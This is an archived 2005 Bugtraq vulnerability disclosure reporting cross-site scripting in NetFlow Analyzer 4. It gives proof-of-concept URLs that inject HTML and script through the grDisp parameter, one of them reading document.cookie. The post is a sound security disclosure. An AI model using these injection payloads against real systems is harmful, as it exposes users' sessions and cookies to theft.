Bugtraq mailing list archives
NetFlow Analyzer 4 XSS Vulnerability
From: why () nsfocus com
Date: 18 Oct 2005 03:37:24 -0000
NetFlow Analyzer 4 http://manageengine.adventnet.com/products/netflow/ I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow Analyzer 4, with this files, sending a specially crafted url you can execute commands in the client side. ____Proof of Concept______ http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1> http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script> http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script> Why, why () nsfocus com
Current thread:
- NetFlow Analyzer 4 XSS Vulnerability why (Oct 18)